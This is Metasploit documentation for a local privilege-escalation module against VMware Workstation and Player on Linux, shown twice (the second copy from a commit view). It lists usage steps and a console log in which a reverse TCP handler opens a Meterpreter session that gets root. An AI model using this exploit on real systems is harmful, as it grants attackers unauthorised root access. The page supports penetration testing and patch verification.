documentation/modules/exploit/linux/local/vmware_alsa_config.md

## Description

  This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card.


## Vulnerable Application

  VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day.

  This module has been tested successfully on:

  * VMware Player version 12.5.0 on Debian Linux


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/linux/local/vmware_alsa_config`
  4. Do: `set SESSION [SESSION]`
  5. Do: `check`
  6. Do: `run`
  7. You should get a new root session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

  ```
  msf exploit(vmware_alsa_config) > check

  [!] SESSION may not be compatible with this module.
  [+] Target version is vulnerable
  [+]  The target is vulnerable.
  msf exploit(vmware_alsa_config) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [+] Target version is vulnerable
  [*] Launching VMware Player...
  [*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400
  [*] Removing /tmp/.baVu7FwzlaIQyp
  [*] Removing /home/user/.asoundrc

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.221
  OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
  Architecture : x64
  Meterpreter  : x64/linux
  ```
Add documentation 2017-06-23 12:40:53 +00:00			`## Description`

			`This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card.`


			`## Vulnerable Application`

			`VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day.`

			`This module has been tested successfully on:`

			`* VMware Player version 12.5.0 on Debian Linux`


			`## Verification Steps`

			1. Start `msfconsole`
			`2. Get a session`
			3. Do: `use exploit/linux/local/vmware_alsa_config`
			4. Do: `set SESSION [SESSION]`
			5. Do: `check`
			6. Do: `run`
			`7. You should get a new root session`


			`## Options`

			`SESSION`

			Which session to use, which can be viewed with `sessions`

			`WritableDir`

			A writable directory file system path. (default: `/tmp`)


			`## Scenarios`

			```
			`msf exploit(vmware_alsa_config) > check`

			`[!] SESSION may not be compatible with this module.`
			`[+] Target version is vulnerable`
			`[+] The target is vulnerable.`
			`msf exploit(vmware_alsa_config) > run`

			`[!] SESSION may not be compatible with this module.`
			`[*] Started reverse TCP handler on 172.16.191.181:4444`
			`[+] Target version is vulnerable`
			`[*] Launching VMware Player...`
			`[*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400`
			`[*] Removing /tmp/.baVu7FwzlaIQyp`
			`[*] Removing /home/user/.asoundrc`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 172.16.191.221`
			`OS : Debian 8.8 (Linux 3.16.0-4-amd64)`
			`Architecture : x64`
			`Meterpreter : x64/linux`
			```